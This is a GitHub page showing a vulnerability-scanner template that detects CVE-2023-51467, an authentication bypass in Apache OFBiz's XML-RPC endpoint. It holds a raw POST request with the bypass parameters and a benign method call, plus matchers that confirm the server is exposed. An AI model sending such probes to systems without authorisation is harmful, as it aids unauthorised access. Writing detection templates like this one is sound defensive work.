-
Notifications
You must be signed in to change notification settings - Fork 1
/
CVE-2023-51467.yaml
35 lines (31 loc) · 1015 Bytes
/
CVE-2023-51467.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
id: CVE-2023-51467
info:
name: Apache OFBiz XML-RPC Java Deserialization
author: dwisiswant0
severity: medium
# This temaplte detects a Java deserialization vulnerability in Apache
# OFBiz's bypass authenticated XML-RPC endpoint /webtools/control/xmlrpc for
# versions prior to 17.12.04.
requests:
- raw:
- |
POST /webtools/control/xmlrpc?USERNAME&PASSWORD=mdtest&requirePasswordChange=Y HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml
<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>
matchers-condition: and
matchers:
- type: word
words:
- "faultString"
- "No such service [ProjectDiscovery]"
- "methodResponse"
condition: and
part: body
- type: word
words:
- "Content-Type: text/xml"
part: header
- type: status
status:
- 200